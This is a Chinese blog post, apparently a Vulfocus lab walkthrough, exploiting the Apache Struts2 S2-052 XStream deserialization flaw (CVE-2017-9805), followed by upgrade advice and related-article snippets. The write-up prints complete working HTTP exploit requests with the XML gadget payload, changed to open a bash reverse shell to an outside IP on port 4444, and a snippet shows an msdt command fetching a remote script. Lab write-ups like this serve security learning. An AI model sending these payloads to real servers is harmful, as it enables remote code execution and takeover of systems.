[Vulfocus解题系列] Struts2-052远程代码执行漏洞(CVE-2017-9805)

最新推荐文章于 2024-05-26 09:51:42 发布
最新推荐文章于 2024-05-26 09:51:42 发布
阅读量2.2k 收藏 4
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/118719988
版权

漏洞介绍

名称: struts2-052 远程代码执行 (CVE-2017-9805)

描述: Apache Struts是美国阿帕奇(Apache)软件基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。REST plugin是其中的一个处理传入URL请求的插件。 攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有执行严格的过滤导致远程代码执行。

解题过程

1.打开靶场
在这里插入图片描述
2.抓包
在这里插入图片描述
3.在burpsuite中改包进行重放,payload如下。

POST /orders HTTP/1.1
Host: 192.168.0.23:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://192.168.0.23:8080/orders/3/edit
Cookie: JSESSIONID=038C79EF8BD97CF8A5F02024C3EC34ED
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 1673
<map> 
<entry> 
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> 
<command>
<string>/usr/bin/touch</string>  
<string>/tmp/shell.txt</string> 
</command> 
<redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
</entry> 
</map>

上面的数据包中执行命令的地方在这里:

<command>
<string>/usr/bin/touch</string>  
<string>/tmp/shell.txt</string> 
</command>

执行的是创建shell.txt文件的命令,但我们需要的是获取flag,于是修改pyload,改成反弹shell的命令:
在远程命令执行过程中,由于务器不识别&这个符号,需要编码,将&换成 &amp;,如下所示

<command>
<string>bash</string>
<string>-c</string>
<string>bash -i >&amp; /dev/tcp/82.156.16.168/4444 0>&amp;1</string>
</command>

4.服务器终端打开监听
在这里插入图片描述
5.burp中发送构造好的数据包,让目标服务器执行反弹shell命令
我最终发送的数据包为:

POST /orders HTTP/1.1
Host: 118.193.36.37:40649
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://192.168.0.23:8080/orders/3/edit
Cookie: JSESSIONID=038C79EF8BD97CF8A5F02024C3EC34ED
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 1717

<map> 
<entry> 
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> 
<command>
<string>bash</string>
<string>-c</string>
<string>bash -i >&amp; /dev/tcp/82.156.16.168/4444 0>&amp;1</string>
</command> 
<redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
</entry> 
</map>

在这里插入图片描述
6.成功反弹shell,执行ls /tmp命令获取flag。
在这里插入图片描述

修复建议

升级Apache struts 至 2.5.13 版本

如果系统没有使用Struts REST插件,那么可以直接删除Struts REST插件,或者在配置文件中加入如下代码,限制服务端文件的扩展名

<constant name=“struts.action.extension” value=“xhtml,json” />

00勇士王子
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Struts2-052复现,并反弹Shell
Becktick的博客
03-31 1246
Struts2-052复现,并反弹Shell 技术无罪,请勿用于恶意用途 转载请注明出处! 测试机:kali linux,win10 工具:burp 靶机:cenOS7 测试机IP:192.168.213.136 靶机IP:192.168.213.138 环境: docker 一. 环境搭建 docker搭建可以参考这位小姐姐的文章: http://bbs.dark5.net/?thread-24...
Struts2-052CVE-2017-9805远程代码执行漏洞复现
weixin_44253823的博客
11-06 1459
漏洞简介:2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码漏洞的成因是由于使用XStreamHandler反序列...
探索Apache Struts漏洞CVE-2017-9805的解决方案:struts-pwn工具包
最新发布
gitblog_00096的博客
05-26 417
探索Apache Struts漏洞CVE-2017-9805的解决方案:struts-pwn工具包 项目地址:https://gitcode.com/mazen160/struts-pwn_CVE-2017-9805 在这个快速发展的数字时代中,安全问题始终是应用程序开发的核心关注点。Apache Struts作为一款广受欢迎的MVC框架,其安全性直接影响到依赖它的数百万Web应用。然而,就像任何...
CVE-2017-9805:Struts2 REST插件远程执行命令漏洞(S2-052) 分析报告
weixin_33736649的博客
09-06 293
一. 漏洞概述 2017年9月5日,Apache Struts 2官方发布一个严重级别的安全漏洞公告,该漏洞由国外安全研究组织lgtm.com的安全研究人员发现,漏洞编号为CVE-2017-9805(S2-052),在一定条件下,攻击者可以利用该漏洞远程发送精心构造的恶意数据包,获取业务数据或服务器权限,存在高安全风险。 二. 漏洞基本信息...
【S2-052Struts2远程命令执行漏洞CVE-2017-9805
Unitue_逆流
10-13 5904
**操作机:**Windows 7**目标IP:**172.16.11.2:8080实验工具: Burp Suite:是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP 消息,持久性,认证,代理,日志,警报的一个强大的可扩展的框架,本次试验主要用到它的抓包改包功能。 Metasploit:一款
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
WY92139010的博客
07-16 2012
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现 一、漏洞概述 Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 二...
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,...[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在...
PHP-CGI远程代码执行漏洞分析与防范
10-19
本文给大家介绍的是PHP-CGI远程代码执行漏洞CVE-2012-1823)分析和防范,这是最近爆出的一个php的比较严重的漏洞,这里分享给大家。
Apache Struts2(S2-052远程代码执行漏洞利用和修复建议
蚁景网安学院
09-06 3241
点击“合天智汇”关注,学习网安干货话说哥们正吃着火锅唱着歌呢~~突然瞥见微信群的信息“Struts2 S2-052 RCE。。。。”赶紧放下筷子瞅一眼,这Struts2真是不让人省心啊,...
Struts2——052CVE-2017-9805远程代码执行漏洞复现
Stephen Wolf
11-23 1084
一、漏洞描述: 2017年9月5日,Apache Struts官方发布最新的安全公告称,Apache Struts 2.5.x的REST插件存在远程代码执行高危漏洞漏洞编号为CVE-2017-9805(S2-052),受影响的版本为Struts 2.5 - Struts 2.5.12。攻击者可以通过构造恶意XML请求在目标服务器上远程执行任意代码漏洞的成因是由于使用XStre...
Struts2 s2-052 REST插件远程代码执行技术分析与防护方案
zzkk_的博客
09-07 1574
2017年9月5日,Apache Struts发布最新的安全公告,Apache Struts 2.5.x以及之前的部分2.x版本的REST插件存在远程代码执行的高危漏洞漏洞编号为CVE-2017-9805(S2-052)。漏洞的成因是由于使用XStreamHandler反序列化XStream实例的时候没有任何类型过滤导致远程代码执行。 相关地址: https://struts.apa
绿盟科技网络安全威胁周报2017.36 Struts2远程代码执行漏洞(S2-052CVE-2017-9805
weixin_34067049的博客
09-01 334
绿盟科技发布了本周安全通告,周报编号NSFOCUS-17-36,绿盟科技漏洞库本周新增29条,其中高危6条。本次周报建议大家关注Apache Struts2远程代码执行漏洞(S2-052)。Struts2 REST插件的XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。该漏洞利用简单、危害...
Struts2-052 漏洞复现
weixin_30505751的博客
01-02 330
s2-052漏洞复现 参考链接: http://www.freebuf.com/vuls/147017.html http://www.freebuf.com/vuls/146718.html 漏洞描述: 该漏洞由lgtm.com的安全研究员汇报,编号为 CVE-2017-9805漏洞危害程度为高危(Critical)。 当用户使用带有 XStream 程序的 Stru...
struts2-052漏洞学习笔记
小小鱼的博客
09-14 2354
了解漏洞 struts2是什么? Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Strut...
struts2-052漏洞学习
qq_44312507的博客
12-17 713
struts2-052漏洞学习文档 一、了解漏洞 1.struts2是什么? Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其...
S2-052 远程代码执行漏洞
锋刃科技的博客
06-30 541
影响版本 Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12 环境搭建 cd vulhub/struts2/s2-052 docker-compose up -d 启动环境后,访问http://your-ip:8080/orders.xhtml即可看到showcase页面。 漏洞复现 由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法,所以我们只需要修改orders.xhtml为orders.x
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值